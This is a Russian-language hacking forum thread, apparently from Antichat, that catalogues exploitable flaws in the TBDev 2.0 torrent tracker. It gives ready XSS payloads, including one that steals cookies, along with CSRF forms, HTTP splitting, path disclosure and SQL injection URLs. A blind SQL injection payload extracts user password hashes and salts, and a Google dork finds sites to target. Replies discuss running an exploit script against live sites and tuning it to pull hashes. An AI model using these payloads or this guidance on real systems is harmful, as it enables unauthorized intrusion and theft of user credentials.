![]() |
Трекер-движок TBDev 2.0
Баги искал на, TBDev 2.0 Yuna Scatari Edition, подозреваю что в других редакциях они так-же работают:
Раскрытие пути, если не залогинен: Код:
confirm.php?id[]=Код:
thanks.phpКод:
http://site/offcomment.php?action=<script>alert(/XSS/)</script>Код:
<form action="http://site/getrss.php" method="POST">Код:
<form action="http://site/comment.php?action=edit&cid=ID_комментария" method="POST">Ищется в гугле, как: "Powered by TBDev v2.0" В общем, всё что нашёл сегодня, багов на порядок больше, но искал не оч. глубоко. |
HTTP Splitting (простого пользователя достаточно):
Код:
<form action="http://site/message.php?action=takemessage" method="POST">Код:
<form action="http://site/message.php?action=mass_pm" method="POST">Код:
Referer: ><script>alert(/Hi/)</script>Код:
<form action="http://site/nowarn.php" method="POST">Blind SQL Inj(требуются права модератора) Код:
<form action="http://site/nowarn.php" method="POST"> |
SQL Inj
Код:
http://site/requests.php?action=reset&requestid=sql'SQL Inj Код:
http://site/requests.php?action=reset&requestid=sql'SQL Inj: POST: Код:
http://site/requests.phpBlind SQL Inj: POST: Код:
http://site/offers.phpSQL Inj (требуются права модератора): POST: Код:
http://site/offers.phpXSS Код:
http://site/viewrequests.php?category=><script>alert(/XSS/)</script>Код:
http://site/staffmess.php?returnto=><script>alert(/XSS/)</script>Код:
http://site/offcomment.php?action=edit&cid=3Код:
http://site/offcomment.php?action=vieworiginal&cid=3Код:
http://site/offcomment.php?action=delete&cid=1&sure=1&returnto=<script>alert(document.cookie)</script>Код:
http://site/offcomment.php?action=edit&cid=3Сори за неупорядоченность, постил по мере нахождения. Кстати, теперь по Powered by TBDev на второй строчке гугла находится античат :D |
TBDev v2.0 Blind SQL Injection Exploit
Код:
http://site/requests.php?action=reset&requestid=sql'Код:
/requests.php?action=reset&requestid=-1+or+id=if(ascii(substring((select+passhash+from+users+where+id=1),1,1))=[CHARCODE],'1',(select+1+union+select+2))+--+Результат работы - hash, salt. hash закодирован как: md5($salt.$pass.$salt); Запускать так: Код:
tbdev2sql.php url target_id login passwordСобственно код: Код:
<? |
/requests.php?action=reset&requestid=-1+or+id=if(ascii(substring((select+passhash+from+u sers+where+id=1),1,1))=[CHARCODE],'1',(select+1+union+select+2))+--+
SQL ругается.. но иньекция не проходит. в чаркод что писать?.. кодировку базы? о_0 tbdev2sql.php url target_id login password За скрипт спасибо, залил на хост юзаю.. Цитата:
|
Цитата:
Для passhash это числа от 48 до 57 включительно (0-9) и от 97 до 102 включительно (a-f). Позиция проверяемого символа задаётся в этом кусочке запроса: Код:
(select+passhash+from+u sers+where+id=1),[POS],1)Если хочешь получить соль, то вместо "passhash" подставь "secret" и диапазоны pos - 1-20, charcode - 49-57,65-90,97-122 (включительно). Соль - 20 символов [1-9,a-Z] Цитата:
P.S. А вообще посмотри сплоит, код очень прост для понимания. |
Ещё одно раскрытие пути обнаружил:
details.php?id[]= |
Ещё XSS, требуются права модератора:
Код:
http://site/stats.php?uporder="><script>alert(/XSS/)</script> |
Qwazar, а как подставить куки в эксплоит.. я юзаю его на VDS. У себя дома с поддержкой CLI запустить не вышло.. зато на VDS по ssh пошло, как по маслу.. как подменить куки? +++
|
Цитата:
Но если очень хочется, можешь эту строку Код:
$cookie = getcookie($url, $name, $password);Код:
$cookie = "А СЮДА ВСЁ ЧТО ХОЧЕШЬ" |
| Время: 22:24 |